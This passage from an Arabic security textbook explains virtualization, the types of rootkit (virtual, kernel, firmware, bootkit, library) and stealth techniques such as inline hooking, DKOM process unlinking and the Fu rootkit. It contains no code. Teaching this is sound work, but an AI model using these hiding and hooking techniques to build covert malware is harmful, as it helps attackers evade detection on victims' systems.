‫وﻟﻠﺗﻌرف أﻛﺛر ﻋﻠﻰ ال ‪ Virtual Rootkits‬او‪ Hypervisor-level rootkits‬ﯾﺟب ان ﻧﺗﻌرف ﻗﻠﯾﻼ ﻋﻠﻰ ﺗﻛﻧوﻟوﺟﯾﺎ ال ‪Virtualization‬‬
‫واﻟﺗﻲ ﺗﻧﻘﺳم اﻟﻲ ﺛﻼث ﻋﻧﺎﺻر رﺋﯾﺳﯾﺔ وھﻲ‪:‬‬
‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬
‫‪437‬‬

‫‪Hypervisor -‬‬
‫‪Virtualization strategies -‬‬
‫‪Virtual memory management -‬‬
‫ﺑﻌد ذﻟك ﺳﻧﺗﻌرف ﻋﻠﻰ اﺳﺎﻟﯾب ال ‪ Virtual Rootkit‬ﻣﺛل‪:‬‬
‫‪-‬‬ ‫‪Escaping from a virtual environment‬‬
‫‪-‬‬ ‫‪Hijacking the hypervisor‬‬
‫‪Virtualization‬‬
‫ﻋﻣﻠﯾﺔ اﻟــ ‪ Virtualization‬ﺑﺎﺧﺗﺻﺎر ھﻲ ﻋﻣﻠﯾﺔ ﺗﻘﺳﯾم ﻣوارد ‪ Resources‬اﻟﺟﮭﺎز اﻟواﺣد ﻋﻠﻰ أﻛﺛر ﻣن ﻧظﺎم ﺗﺷﻐﯾل ‪ OS‬ﺗﻌﻣل ﺳوﯾﺎ ﻓﻲ‬
‫ﻧﻔس اﻟوﻗت‪ .‬وﻗﺑل ﺗﻛﻧوﻟوﺟﯾﺎ ال ‪ Virtualization‬ﻛﺎن ﯾﻌﻣل اﻟﺟﮭﺎز ﺑﻛل ﻣوارده ﻟﺗﺷﻐﯾل ﻧظﺎم ﺗﺷﻐﯾل واﺣد ﻓﻘط ﻣﻣﺎ ﯾﻌﻧﻲ ﺿﯾﺎع ﻣوارد‬
‫ﻛﺛﯾره ﻟﻠﺟﮭﺎز ﺧﺎﺻﺔ ﺑﻌد اﻟطﻔرة اﻟﻛﺑﯾرة اﻟﺗﻲ ﺣدﺛت ﻓﻲ ﻗدرات اﻷﺟﮭزة وﻓﻲ ﺻﻧﺎﻋﺔ اﻟﻣﻌﺎﻟﺟﺎت واﯾﺿﺎ زﯾﺎدة ﺳﻌﺔ اﻟﺗﺧزﯾن‪Memory‬‬
‫وﺗﺳﺗﺧدم ھذه اﻟﺗﻛﻧوﻟوﺟﯾﺎ اﻷن ﻓﻲ اﻟﺳﯾرﻓرات ﺣﯾث ﯾﺳﺗطﯾﻊ ﻣدﯾر اﻟﺳﯾرﻓر ﺗﺷﻐﯾل أﻛﺛر ﻣن ‪ Web Server‬ﻋﻠﻰ ﺟﮭﺎز اﻟواﺣد‪ .‬اﯾﺿﺎ اﻧﺗﻘﻠت‬
‫ھذه اﻟﺗﻛﻧوﻟوﺟﯾﺎ اﻟﻲ اﻷﺟﮭزة اﻟﻌﺎدﯾﺔ ‪ PC‬ﺣﯾث ﯾﺳﺗطﯾﻊ اﻟﻣﺳﺗﺧدم ﺗﺷﻐﯾل أﻛﺛر ﻣن ﻧظﺎم ﺗﺷﻐﯾل ﺳوﯾﺎ ﻣﺛل ﺗﺷﻐﯾل اﻟوﯾﻧدوز ﻣﻊ ال‪. Linux‬‬
‫‪Virtualization of system resources‬‬
‫أﻧواع ال ‪Virtual Machines‬‬
‫‪ -1‬اﻟﻧوع اﻷول ‪ Process Virtual Machine‬اﯾﺿﺎ ﯾﻌرف ﺑــ ‪ Application Virtual Machine‬وھو ﺑﺎﺧﺗﺻﺎر ﻟﺗﺷﻐﯾل‬
‫‪Process‬ﻣﻌﯾﻧﺔ ﻋﻠﻰ ﻧظﺎم اﻟﺗﺷﻐﯾل ﻣﺛل ال ‪ Java Virtual Machine‬وال ‪ Dot NET Framework‬ﻓﮭذه اﻷﺷﯾﺎء اﯾﺿﺎ‬
‫ﺗﻧدرج ﺗﺣت ﻣﺳﻣﻲ اﻷﺟﮭزة اﻟوھﻣﯾﺔ‪. Virtual Machines‬‬
‫‪ -2‬اﻟﻧوع اﻟﺛﺎﻧﻲ ‪ System Virtual Machines‬اﯾﺿﺎ ﯾﻌرف ﺑــ ‪ Hardware virtual machine‬وھذا ﻣﺧﺻص ﻟﻛﻲ ﯾﻌﻣل‬
‫أﻛﺛر ﻣن ﻧظﺎم ﺗﺷﻐﯾل ﺳوﯾﺎ‪.‬‬
‫‪Hypervisor‬‬
‫ھو أﺣد اھم ﻋﻧﺎﺻر ال ‪ Hardware VM‬طﺑﻌﺎ ‪ VM‬اﺧﺗﺻﺎر ﻟــ ‪ Virtual Machine‬وھو اﻟﻣﺳؤول ﻋن ‪Handles System‬‬
‫‪level virtualization‬ﻟﻛل ال ‪ VMs‬اﻟﺗﻲ ﺗﻌﻣل ﻋﻠﻰ اﻟﺟﮭﺎز اﻟرﺋﯾﺳﻲ ‪ Host System‬وھو اﯾﺿﺎ ﯾدﯾر ﻋﻣﻠﯾﺔ ﺗﻘﺳﯾم اﻟﻣوارد واﻟﺗﺷﻐﯾل‬
‫ﺑﯾن ال ‪ Physical‬وال ‪Virtual Hardware‬اﯾﺿﺎ ھو اﻟﻣﺳؤول ﻋن ﻋﻣﻠﯾﺔ ﻋزل ال ‪ VMs‬ﻋن ﺑﻌﺿﮭﺎ وﺗﻘﺳﯾم اﻟﻣوارد ﺑﯾﻧﮭﺎ‪ .‬ﻓﮭو اﻟﻌﻘل‬
‫اﻟﻣﺗﺣﻛم ﻓﻲ ﻋﻣﻠﯾﺔ ال‪virtualization‬‬
‫ﯾوﺟد ﻧوﻋﯾن ﻣن ال‪: Hypervisor‬‬
‫‪ -‬اﻟﻧوع اﻷول ‪ Native‬وھو ﯾﺗم وﺿﻌﺔ ﻓﻲ اﻟﻠوﺣﺔ اﻷم ﻧﻔﺳﮭﺎ ‪ Motherboard‬اي ان ﺗﻛﻧوﻟوﺟﯾﺎ ال ‪ VM‬ﻓﻲ ھذا اﻟﻧوع ﻟﯾﺳت‬
‫ﻣﺟرد ﺑرﻧﺎﻣﺞ ﺑل ھﻲ ﺗدﺧل ﻓﻲ ﺗرﻛﯾب ال ‪ Hardware‬اﯾﺿﺎ‪ .‬وﻣن اﻣﺛﻠﺔ اﻟﻣﻌﺎﻟﺟﺎت اﻟﺗﻲ ﺗدﻋم ﺧﺎﺻﯾﺔ ال ‪Native Hypervisor‬‬
‫ﻣﻌﺎﻟﺟﺎت ‪ AMD-V/Pacifica‬و ‪Intel VT‬و‪.UltraSPARC T1‬‬
‫‪ -‬اﻟﻧوع اﻟﺛﺎﻧﻲ ‪ Hosted‬وھو اﻟﻧوع اﻟﺑرﻣﺟﻲ اﻟذي ﯾﺗم وﺿﻌﺔ ﻣﻊ ﻧظﺎم اﻟﺗﺷﻐﯾل اﻟرﺋﯾﺳﻲ ‪ Host OS‬ﻣﺛل ﺑراﻣﺞ ال ‪VMWare‬‬
‫وال ‪.Oracle Virtual Box‬‬
‫‪Virtualization strategies‬‬
‫ﯾوﺟد ﺛﻼث اﻧواع ﻣن طرق ال ‪ Virtualization‬اﻟﻣﺳﺗﺧدﻣﺔ ﺣﺎﻟﯾﺎ واﻟﺗﻲ ﺗﺧﺗﻠف ﻣن ﻧظﺎم ﺗﺷﻐﯾل اﻟﻲ أﺧر وﻣن ﻋﻧﺎﺻر ال ‪Hardware‬‬
‫اﻟﻣﺳﺗﺧدﻣﺔ‪.‬‬
‫اﻟطرﯾﻘﺔ اﻷوﻟﻲ ھﻲ ‪ virtual machine emulation‬وھو ﯾﺣﺗﺎج اﻟﻲ ‪ hypervisor‬ﯾﻘوم ﺑﻣﺣﺎﻛﺎة اﻷﺟﮭزة ‪ Hardware‬اﻟﺣﻘﯾﻘﯾﺔ‬
‫ﺑﺄﺧرى ﺗﺧﯾﻠﯾﺔ ﯾﺳﺗﺧدﻣﮭﺎ ﻧظﺎم اﻟﺗﺷﻐﯾل اﻟﻣوﺟود ﻋﻠﻰ ال ‪ VM‬واﻟذي ﯾﺳﻣﻲ ‪ guest OS‬ﻓﮭو ﯾوھم ﻧظﺎم اﻟﺗﺷﻐﯾل اﻟﺗﺧﯾﻠﻲ ﺑﺎﻧﺔ ﯾﺗﻌﺎﻣل ﻣﻊ‬
‫‪Hardware‬ﺣﻘﯾﻘﯾﺔ‪ .‬واھم ﺷﻲء ﻓﻲ ھذه اﻟطرﯾﻘﺔ ھو ﺗوﻓﯾر ﻛل اﻟﺻﻼﺣﯾﺎت ﻟﻠﻧظﺎم اﻟوھﻣﻲ ‪ Privilege Level‬ﻣﺛل ﺻﻼﺣﯾﺎت اﺳﺗدﻋﺎء‬
‫‪Privileged CPU instructions‬وھذا ﯾوﻓره ال ‪ hypervisor‬ﻧﻔﺳﮫ‪.‬‬
‫اﻟطرﯾﻘﺔ اﻟﺛﺎﻧﯾﺔ ھﻲ ‪ paravirtualization‬وھﻲ ﻋﻛس اﻟطرﯾﻘﺔ اﻷوﻟﻲ ﺣﯾث ﻻ ﯾﻘوم ال ‪ hypervisor‬ﺑﺗوﻓﯾر ال ‪Privileged CPU‬‬
‫‪instructions‬وﻻ ﯾﻘوم ﺑﻣﺣﺎﻛﺎة ﻟل ‪ Hardware‬ﻓﮭذه اﻟطرﯾﻘﺔ ﯾدرك ﻓﯾﮭﺎ ﻧظﺎم اﻟﺗﺷﻐﯾل اﻟوھﻣﻲ اﻧﮫ ﯾﻌﻣل ﻓﻌﻼ ﻋﻠﻰ ﺟﮭﺎز وھﻣﻲ‪VM‬‬
‫اﻟطرﯾﻘﺔ اﻟﺛﺎﻟﺛﺔ ھﻲ ‪ OS-level virtualization‬وﻣن اﻻﺳم ﯾﺗﺿﺢ ان ﻧظﺎم اﻟﺗﺷﻐﯾل ﻧﻔﺳﮫ ھو ﻣن ﯾﻘوم ﺑﻌﻣﻠﯾﺔ اﻟﻌزل‪.‬‬
‫‪Virtual memory management‬‬
‫ﻣن اھم وظﺎﺋف ال ‪ hypervisor‬ھو ﺗﺣوﯾل ال ‪ physical Hardware Memory‬اﻟﻲ‪Virtual Hardware Memory‬‬
‫وﻛﻣﺎ ﻧﻌﻠم ﻓﺎن ﻣﺻطﻠﺢ ال ‪ Virtual Memory‬ﻟﯾس ﺧﺎص ﺑﻌﻣﻠﯾﺔ ال ‪ virtualization‬ﻓﻘط ﺑل ان ﻛل اﻧظﻣﺔ اﻟﺗﺷﻐﯾل اﻟﺣدﯾﺛﺔ ﺗﻘوم‬
‫ﺑﺎﺳﺗﺧدام ال ‪ Virtual memory‬وذﻟك ﻟﻛﻲ ﺗدﻋم ﻋﻣﻠﯾﺔ ال‪multiprocessing‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪438‬‬

‫اﯾﺿﺎ ﻣن اھم وظﺎﺋف ال ‪ hypervisor‬ﻋﻣﻠﯾﺔ ﻋزل ﻛل ‪ Virtual Memory‬ﯾﺳﺗﺧدﻣﮭﺎ ‪ VM‬ﻋن اﻷﺧرى‪ .‬ﻓﻛل ‪ VM‬ﯾﻛون ﻟﮫ ال‬
‫‪memory space‬اﻟﺧﺎص ﺑﮫ واﻟﺗﻲ ﻻ ﯾﺳﺗطﯾﻊ اي ‪ VM‬اﺧر اﻟوﺻول اﻟﯾﮭﺎ‪ .‬وھذه اﻟﻌﻣﻠﯾﺔ ﺗﻌرف ﺑــ‪virtual machine isolation‬‬
‫اﺳﺎﻟﯾب ال‪Virtual Rootkit‬‬
‫ﻛﻣﺎ ﻗﻠﻧﺎ ﻓﺎن ال ‪ Virtual Rootkits‬ھﻲ روت ﻛﯾت ﺑرﻣﺟت ﺧﺻﯾﺻﺎ ﻟﻛﻲ ﺗﻌﻣل ﻋﻠﻰ ال ‪ VM‬وﺗﻧﺗﻘل ﻣﻧﺔ اﻟﻲ ال ‪ Host Machine‬ﻟذﻟك‬
‫ﻓﺎن اول ﻣﮭﻣﺔ ﺗﻘوم ﺑﮭﺎ ھذه اﻟروت ﻛﯾت ھﻲ ﻋﻣﻠﯾﺔ اﻟــ ‪ Escaping from a virtual environment‬واول ﺧطوة ﻓﻲ ھذه اﻟﻌﻣﻠﯾﺔ ھﻲ‬
‫ان ﯾﻛﺗﺷف اﻟروت ﻛﯾت اﻧﮫ ﯾﻌﻣل ﻓﻌﻼ ﻋﻠﻰ ‪ VM‬وﻟﯾس ﻋﻠﻰ ﺟﮭﺎز ﺣﻘﯾﻘﻲ‪.‬‬
‫ﯾوﺟد ‪ 3‬اﻧواع رﺋﯾﺳﯾﺔ ﻣن ال‪: Virtual Rootkits‬‬
‫اﻟﻧوع اﻷول ھو )‪ Virtualization-aware malware (VAM‬وھو ﻣﺧﺻص ﻟﻠﻔﯾروﺳﺎت واﻟﺑرﻣﺟﯾﺎت اﻟﺿﺎرة ﻓوظﯾﻔﺗﮫ اﻧﮫ ﯾﻘوم ﺑﺎﻛﺗﺷﺎف‬
‫ال ‪ VM‬ﺛم ﯾﻌدل ﻣن ﺧﺻﺎﺋﺻﮫ ﻓﯾﻣﺎ ﯾﻌرف ﺑﻌﻣﻠﯾﺔ ال ‪ polymorphic‬ﺣﺗﻰ ﻻ ﯾﺳﺗطﯾﻊ ﻣﺣﻠل اﻟﻔﯾروﺳﺎت اﻟﺗﻌرف ﻋﻠﯾﺔ‪ .‬اﯾﺿﺎ ﻟدﯾﺔ وظﯾﻔﺔ‬
‫اﺧري وھو ﻣﮭﺎﺟﻣﺔ ﻧظﺎم اﻟﺗﺷﻐﯾل اﻟذي ﯾﻌﻣل ﻋﻠﻰ ال‪. VM‬‬
‫اﻟﻧوع اﻟﺛﺎﻧﻲ ھو )‪ Virtual machine-based rootkits (VMBR‬وھو اﻟﻧوع اﻟﺗﻘﻠﯾدي وھو اﻟذي ﯾﺳﺗطﯾﻊ اﻻﻧﺗﻘﺎل ﻣن ال ‪ VM‬اﻟﻲ‬
‫اﻟﺟﮭﺎز اﻷﺻﻠﻲ ﻋن طرﯾﻖ ﺑرﻧﺎﻣﺞ ال ‪ VM‬ﻧﻔﺳﮫ‪virtualization software‬‬
‫اﻟﻧوع اﻟﺛﺎﻟث ھو ‪ Hypervisor virtual machine (HVM) rootkits‬وھو أﺧطر ﻧوع ﻷﻧﮫ ﯾﻘوم ﺑﻣﮭﺎﺟﻣﺔ ال ‪ hypervisor‬ﻧﻔﺳﮫ‬
‫واﺳﺗﺑداﻟﮫ ﺑﺄﺧر ﻣﻌدل وﺑﺎﻟﺗﺎﻟﻲ اﺻﺎﺑﺔ ﻧظﺎم اﻟﺗﺷﻐﯾل اﻟﻣوﺟود ﻋﻠﻰ ال ‪ VM‬وﻧظﺎم اﻟﺗﺷﻐﯾل اﻟرﺋﯾﺳﻲ‪. host‬‬
‫ﺑﻌد اﻛﺗﺷﺎف اﻟروت ﻛﯾت ﻟل ‪ VM‬ﺗﺄﺗﻲ اﻟﻣﮭﻣﺔ اﻷھم وھﻲ اﻟوﺻول اﻟﻲ ال ‪ host machine‬وﺗﺗم ﻋﻣﻠﯾﺔ اﻟوﺻول ﻟل ‪ host‬ﻋن طرﯾﻖ‬
‫اﺳﺗﻐﻼل ﺛﻐرات ‪ exploit‬ﺗؤدي ﻟﺗﻌطﯾل ‪ crash‬ﺧدﻣﺔ ‪ service‬او ﺗﻌطﯾل ﻛل ال ‪ VM‬ﻣﻣﺎ ﯾﻣﻛن اﻟروت ﻛﯾت ﻣن اﻟوﺻول اﻟﻲ ال ‪Host‬‬
‫‪ .machine‬اﯾﺿﺎ ﻣن اھم طرق ﺗﺧطﻲ ال ‪ VM‬ھﻲ اﺳﺗﻐﻼل اﻟــ ‪ ComChannel‬وھﻲ ﻗﻧوات اﺗﺻﺎل ﺑﯾن ال ‪ gust OS‬وال ‪host OS‬‬

‫ﺑﻌد ﻋﻣﻠﯾﺔ اﻟوﺻول اﻟﻲ ال ‪ Host Machine‬ﺗﺗم ﻋﻣﻠﯾﺔ اﻟﺳﯾطرة ﻋﻠﻰ ال ‪ Hypervisor‬ﻋن طرﯾﻖ ﻣﺎ ﯾﻌرف ﺑـ ‪Hijacking the Hypervisor‬‬
‫ﻓﺑﺳﯾطرة اﻟروت ﻛﯾت ﻋﻠﻰ ال ‪ hypervisor‬ﻓﮭو ﯾﺳﯾطر ﻋﻠﻰ ‪Virtualization‬وﺑﺎﻟﺗﺎﻟﻲ ﯾﺳﺗطﯾﻊ اﻟﺳﯾطرة ﻋﻠﻰ ﻛل اﻟﻧظﺎم ﺳواء ‪ VM‬او‬
‫‪.HostVM‬‬
‫ﻣن أﺷﮭر اﻧواع ال ‪ Virtual Rootkits‬ھو‬
‫‪SubVirt‬ﺑرﻣﺟﺔ ‪ Samuel T. King and Peter M.‬ﺗم ﻋﻣﻠﺔ ﻓﻲ ﺟﺎﻣﻌﺔ‪. Michigan‬‬
‫‪Blue Pill‬ﺑرﻣﺟﺔ ‪ Joanna Rutkowska‬وھو ﻣﺧﺻص ﻟﻣﻌﺎﻟﺞ‪. AMD-V‬‬
‫‪Vitriol‬ﺑرﻣﺟﺔ ‪ Dino Dai Zovi‬ﻣﺧﺻص ﻟﻣﻌﺎﻟﺞ‪. Intel VT‬‬
‫‪Kernel-Level Rootkit‬‬

‫اﻟﻧواة‪/‬اﻟﻛﯾرﻧل ھﻲ ﺟوھر ﻧظﺎم اﻟﺗﺷﻐﯾل‪ .‬ھذا اﻟﻧوع ھو اﻻﺧطر ﻷﻧﮫ ﯾﺻﯾب ﻧواة اﻟﻧظﺎم وھو ال ‪ Kernel‬وﻗدرﺗﮫ ﻋﻠﻰ اﻟﺗﺧﻔﻲ ﻛﺑﯾرة وﯾﺻﻌب‬
‫اﻛﺗﺷﺎﻓﮫ ﺑﺎﻟﺑراﻣﺞ اﻟﺗﻘﻠﯾدﯾﺔ وﯾﺣﺗﺎج اﻟﻲ ﺗﺣﻠﯾل ﯾدوي ﻷﺧﺻﺎﺋﻲ اﻟﻛﯾرﻧل ﺣﺗﻰ ﺗﺗﻣﻛن ﻣن اﻛﺗﺷﺎﻓﮫ‪ .‬وھذا ﯾﻘوم ﺑﺗﻐطﯾﺔ ‪ backdoors‬ﻋﻠﻰ‬
‫اﻟﻛﻣﺑﯾوﺗر وﯾﺗم إﻧﺷﺎﺋﮫ ﻣن ﺧﻼل ﻛﺗﺎﺑﺔ ﺗﻌﻠﯾﻣﺎت ﺑرﻣﺟﯾﺔ إﺿﺎﻓﯾﺔ أو ﻋن طرﯾﻖ اﺳﺗﺑدال أﺟزاء ﻣن ﻛود اﻟﻧواة‪/‬اﻟﻛﯾرﻧل ﻣﻊ اﻛواد ﻣﻌدﻟﮫ وﯾﺗم ذﻟك‬
‫ﻋﺑر ﺑراﻣﺞ ﺗﺷﻐﯾل اﻷﺟﮭزة )‪ (device driver‬ﻓﻲ ‪ Windows‬أو وﺣداة اﻟﻧواة )‪ (loadable kernel module‬ﻓﻲ ﻟﯾﻧﻛس‪ .‬ﻓﺈذا ﻛﺎن‬
‫ھﻧﺎك أي ﺧطﺎ او ‪ bugs‬ﻓﻲ رﻣز ‪ ،Rootkits‬ﻓﺎن ھذا ﺳوف ﯾؤﺛر ﻋﻠﻰ اﺳﺗﻘرار اﻟﻧظﺎم إﻟﻰ ﺣد ﻛﺑﯾر ﻣن ﻗﺑل ‪ Rootkits‬ﻋﻠﻰ ﻣﺳﺗوى‬
‫اﻟﻧواة‪ .‬ﻟﮭﺎ ﻧﻔس اﻣﺗﯾﺎزات ﻧظﺎم اﻟﺗﺷﻐﯾل‪ ،‬وﺑﺎﻟﺗﺎﻟﻲ ﻓﮭﻲ ﺻﻌﺑﺔ اﻟﻛﺷف واﻻﻋﺗراض أو ﺗﺧرﯾب ﻋﻣﻠﯾﺎت ﻧظم اﻟﺗﺷﻐﯾل‪.‬‬
‫‪Application-level Rootkit‬‬

‫‪ Application-level rootkit‬ﺗﻌﻣل داﺧل ﺟﮭﺎز ﻛﻣﺑﯾوﺗر اﻟﺿﺣﯾﺔ ﻋن طرﯾﻖ اﺳﺗﺑدال ﻣﻠﻔﺎت ﺗطﺑﯾﻖ ﻣﻌﯾن ﻣﻊ ‪ Rootkits‬أو ﻋن طرﯾﻖ‬
‫ﺗﻌدﯾل اﻟﺗطﺑﯾﻘﺎت اﻟﺣﺎﻟﯾﺔ ﻣﻊ ‪ ، injected code ، patches‬اﻟﺦ‪.‬‬
‫‪Hardware/Firmware Rootkit‬‬

‫‪ Hardware/firmware rootkits‬ﺗﺳﺗﺧدم اﻷﺟﮭزة أو ﻣﻧﺻﺎت اﻷﺟﮭزة )‪ (devices or platform firmware‬ﻹﻧﺷﺎء ﺻورة‬


‫ﺧﺑﯾﺛﺔ )‪ (malware image‬داﺋﻣﮫ ﻓﻲ اﻷﺟﮭزة‪ ،‬ﻣﺛل اﻟﻘرص اﻟﺻﻠب‪ ،‬وﻧظﺎم ‪ ،BIOS‬أو ﺑطﺎﻗﺔ اﻟﺷﺑﻛﺔ‪ Rootkits .‬ﯾﺧﻔﻲ ﻓﻲ ‪firmware‬‬
‫ﻷﻧﮫ ﻟن ﯾﺗم ﺗﻔﺗﯾش اﻛواد ‪ Firmware rootkit .firmware‬ﯾﻧطوي ﻋﻠﻰ اﻧﺷﺎء وھﻣﻰ داﺋم ﻣن ‪.rootkit malware‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪439‬‬

‫)‪Boot-loader-level Rootkit (Bootkit‬‬

‫)‪ Boot-loader-level Rootkit (Bootkit‬ﺗﻌﻣل إﻣﺎ ﻋن طرﯾﻖ اﺳﺗﺑدال أو ﺗﻌدﯾل ﻣﺣﻣل اﻹﻗﻼع )‪ (boot loader‬ﺑواﺣد أﺧر‪ .‬ﯾﻣﻛن‬
‫ﺗﻔﻌﯾﻠﮭﺎ ﺣﺗﻰ ﻗﺑل ﺑدء ﺗﺷﻐﯾل ﻧظﺎم اﻟﺗﺷﻐﯾل‪ .‬ﻟذﻟك‪ Boot-loader-level Rootkit (Bootkit) ،‬ھﻲ اﻟﺗﮭدﯾدات ﺧطﯾرة ﻋﻠﻰ اﻷﻣن ﻷﻧﮭﺎ‬
‫ﯾﻣﻛن أن ﺗﺳﺗﺧدم ﻻﺧﺗراق ﻣﻔﺎﺗﯾﺢ اﻟﺗﺷﻔﯾر وﻛﻠﻣﺎت اﻟﺳر‪.‬‬
‫‪Library-level Rootkits‬‬

‫‪ Library-level rootkits‬ﯾﻌﻣل ﻓﻲ ﻣﺳﺗوى اﻋﻠﻰ ﻓﻲ ﻧظﺎم اﻟﺗﺷﻐﯾل وﻋﺎدة ﯾﻘوم ﺑﺗﺻﺣﯾﺢ‪ ،‬اﺻطﯾﺎد‪ ،‬أو ﯾﺣل ﻣﺣل ‪ system calls‬ﻣﻊ‬
‫إﺻدارات ‪ backdoor‬ﻟﻠﺣﻔﺎظ ﻋﻠﻰ ﻣﺟﮭوﻟﯾﺔ اﻟﻣﮭﺎﺟم‪ .‬ﺣﯾث ﺗﻌﻣل ﻋﻠﻰ اﺳﺗﺑدال ‪ system calls‬اﻷﺻﻠﻲ ﻣﻊ واﺣده أﺧرى ﻣزﯾﻔﮫ‪/‬وھﻣﯾﮫ‬
‫ﻹﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت ﺣول اﻟﻣﮭﺎﺟم‪.‬‬

‫‪ How Rootkits Work‬ﻛﯾف ﯾﻌﻣل اﻟروت ﻛﯾت؟‬


‫‪ System hooking‬ھو ﻋﻣﻠﯾﺔ ﺗﻐﯾﯾر واﺳﺗﺑدال ﻣؤﺷر اﻟداﻟﺔ اﻷﺻﻠﻲ )‪ (original function pointer‬ﻣﻊ ﻣؤﺷر )‪ (pointer‬ﻣﻘدم ﻣن‬
‫‪ rootkits‬ﻓﻲ وﺿﻊ اﻟﺷﺑﺢ)‪. (stealth mode‬‬

‫‪ Inline function hooking‬ھﻲ ﺗﻘﻧﯾﺔ ﺣﯾث ﯾﻘوم ‪ rootkits‬ﺑﺗﻐﯾر ﺑﻌض اﻟﺑﺎﯾت ﻣن وظﯾﻔﺔ داﺧل ‪ core system DLLs‬ﻣﺛل‬
‫)‪ ، (kernel32.dll and ntdll. dll‬ووﺿﻊ اﻟﺗﻌﻠﯾﻣﺎت ﺑﺣﯾث أن اﺳﺗدﻋﺎء أي ﻋﻣﻠﯾﺔ ﯾﻣر أوﻻ ﻋﻠﻰ ‪.rootkits‬‬

‫‪ Direct Kernel Object Manipulation (DKOM) rootkits‬ھﻲ ﻗﺎدرة ﻋﻠﻰ ﺗﺣدﯾد ﻣﻛﺎن واﻟﺗﻼﻋب ﻓﻲ أي ﻣن ﻋﻣﻠﯾﺎت اﻟﻧظﺎم‬
‫)‪ (System process‬اﻟﻣوﺟودة ﻓﻲ ھﯾﺎﻛل ذاﻛرة ‪ kernel‬وﺗﺻﺣﯾﺢ )‪ (Patch‬ذﻟك أﯾﺿﺎ‪ .‬وھذا ﯾﻣﻛﻧﮫ أﯾﺿﺎ إﺧﻔﺎء اﻟﻌﻣﻠﯾﺎت واﻟﻣﻧﺎﻓذ‪ ،‬ﺗﻐﯾر‬
‫اﻻﻣﺗﯾﺎزات‪ ،‬ﺗﺿﻠﯾل ﻣﺷﺎھد ‪ Windows event viewer‬دون أي ﻣﺷﻛﻠﺔ ﻋن طرﯾﻖ اﻟﺗﻼﻋب ﻓﻲ ﻗﺎﺋﻣﺔ اﻟﻌﻣﻠﯾﺎت اﻟﻧﺷطﺔ ﻣن ﻧظﺎم اﻟﺗﺷﻐﯾل‪،‬‬
‫وﺗﻐﯾﯾر اﻟﺑﯾﺎﻧﺎت داﺧل ھﯾﺎﻛل ﻣﻌرﻓﺎت اﻟﻌﻣﻠﯾﺔ)‪ . (PROCESS IDENTIFIERS structures‬ﻟدﯾﮫ اﻟﻘدرة ﻋﻠﻰ اﻟوﺻول ﻣن اﻟﻧوع‬
‫اﻟﻘراءة‪/‬اﻟﻛﺗﺎﺑﺔ )‪ (read/write access‬إﻟﻰ اﻟﺟﮭﺎز‪/‬اﻟذاﻛرة اﻟﻔﻌﻠﯾﺔ )‪. (Device\Physical Memory object‬‬
‫‪ DKOM rootkits‬ﺗﻘوم ﺑﺈﺧﻔﺎء اﻟﻌﻣﻠﯾﺔ ﻋن طرﯾﻖ ﻋدم ذﻛرھﺎ‪/‬اﺧﻔﺎﺋﮭﺎ ﻣن ﻗﺎﺋﻣﺔ اﻟﻌﻣﻠﯾﺎت‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪440‬‬

‫‪Rootkit: Fu‬‬
‫‪ Fu‬ھو ‪ infection database‬واﻟﺗﻲ ﺗﻌﻣل ﺑﺎﺳﺗﺧدام )‪ Direct Kernel Object Manipulation (DKOM‬وﯾﺄﺗﻲ ﻣﻊ اﺛﻧﯾن ﻣن‬
‫اﻟﻣﻛوﻧﺎت‪the dropper (fu.exe) ،‬و)‪ The Fu rootkit. the driver (msdirectx.sys‬ﯾﻌدل ﻓﻲ ﻛﺎﺋن اﻟﻛﯾرﻧل )‪(kernel object‬‬
‫واﻟذي ﯾﻣﺛل اﻟﻌﻣﻠﯾﺎت ﻓﻲ اﻟﻧظﺎم‪ .‬ﺟﻣﯾﻊ ﻛﺎﺋﻧﺎت اﻟﻛﯾرﻧل )‪ (kernel process objects‬ﺗرﺗﺑط ﻣﻊ ﺑﻌﺿﮭﺎ اﻟﺑﻌض‪ .‬ﻋﻧدﻣﺎ ﯾطﻠب اﻟﻣﺳﺗﺧدم ﻣﺛﻼ‬
‫ﻋﻣﻠﯾﺔ ‪ TaskMgr.exe‬واﻟذي ﯾطﻠب ﻣن ﻧظﺎم اﻟﺗﺷﻐﯾل ﻗﺎﺋﻣﺔ ﻟﺟﻣﯾﻊ اﻟﻌﻣﻠﯾﺎت ﻣن ﺧﻼل‪ ، API‬ﻧظﺎم اﻟﺗﺷﻐﯾل وﯾﻧدوز ﯾذھب ﻟﺟﻣﯾﻊ اﻟﻠﻧﻛﺎت‬
‫اﻟﺧﺎﺻﺔ ﺑﺎﻟﻌﻣﻠﯾﺎت )‪ (process objects‬اﻟﻘﺎﺋﻣﺔ ﺛم ﯾﻌود ﺑﺎﻟﻣﻌﻠوﻣﺎت اﻟﻣﻧﺎﺳﺑﺔ‪ .‬ﯾﺄﺗﻲ ھﻧﺎ دور اﻟروت ﻛت ﻓو واﻟذي ﯾﻘوم ﺑﺈﻟﻐﺎء ﺟﻣﯾﻊ اﻟرواﺑط‬
‫اﻟﻣﺗﺻﻠﺔ )‪ (unlinked‬ﺑﺎﻟﻌﻣﻠﯾﺎت اﻟذي ﯾرﯾد إﺧﻔﺎﺋﮭﺎ‪ .‬ﻟذﻟك‪ ،‬ﯾﻣﻛﻧﺎ اﺧﻔﺎء اﻟﻌدﯾد ﻣن اﻟﺗطﺑﯾﻘﺎت‪ ،‬ﺣﯾث ﻻ ﺗوﺟد ﻋﻣﻠﯾﺔ‪.‬‬
